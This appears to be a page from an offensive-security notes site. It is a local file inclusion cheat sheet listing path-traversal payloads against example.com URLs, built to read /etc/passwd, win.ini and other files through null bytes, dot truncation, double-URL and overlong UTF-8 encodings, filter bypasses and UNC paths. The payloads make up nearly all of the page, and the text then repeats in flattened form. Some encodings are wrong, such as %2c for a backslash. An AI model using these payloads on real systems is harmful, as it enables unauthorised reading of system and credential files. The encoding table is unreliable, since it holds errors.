LFI


NULL CARACTER:
Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.

original→ index.php?somefile=image.jpeg
testing → index.php?somefile=../../../../etc/passwd%00image.jpeg

Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863

===========================================================

Dot Truncation #
In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.

http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd

Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/

=======================================================


Encoding 
Manipulating variables that reference files with “dot-dot-slash" (../) sequences and its variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.

					URL					Double URL				UTF-8 Unicode																16 bits Unicode
.					%2e					%252e					     %c0%2e 		%e0%40%ae	 %c0%ae							%u002e
/					%2f					%252f						%c0%2f		%e0%80%af 	 %c0%af							%u2215
\					%2c					%252c						%c0%5c 		%c0%80%5c	 										%u2216



Encoded ../:

%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215



Encoded ..\:
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216



Double URL Encoding :

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd


UTF-8 Encoding:

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd



Bypass Filtering:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd


Bypass ../ removal:
..././
...\.\


Bypass ../ replaced with ;:
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt




Windows UNC Share:

Windows UNC shares can be injected to redirect access to other resources.

\\localhost\c$\windows\win.ini

PreviousWeb Site Exploitation Vectors NextConfig Files

Last updated 2 years ago

NULL CARACTER: Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters. original→ index.php?somefile=image.jpeg testing → index.php?somefile=../../../../etc/passwd%00image.jpeg Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863 =========================================================== Dot Truncation # In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored. http://example.com/index.php?page=../../../etc/passwd................[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE] http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/ ======================================================= Encoding Manipulating variables that reference files with “dot-dot-slash" (../) sequences and its variations, or using absolute file paths, may allow bypassing poorly implemented input filtering. URL Double URL UTF-8 Unicode 16 bits Unicode . %2e %252e %c0%2e %e0%40%ae %c0%ae %u002e / %2f %252f %c0%2f %e0%80%af %c0%af %u2215 \ %2c %252c %c0%5c %c0%80%5c %u2216 Encoded ../: %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 Encoded ..\: %2e%2e%2c %252e%252e%252c %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2216 Double URL Encoding : http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd UTF-8 Encoding: http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd Bypass Filtering: http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd Bypass ../ removal: ..././ ...\.\ Bypass ../ replaced with ;: ..;/ http://example.com/page.jsp?include=..;/..;/sensitive.txt Windows UNC Share: Windows UNC shares can be injected to redirect access to other resources. \\localhost\c$\windows\win.ini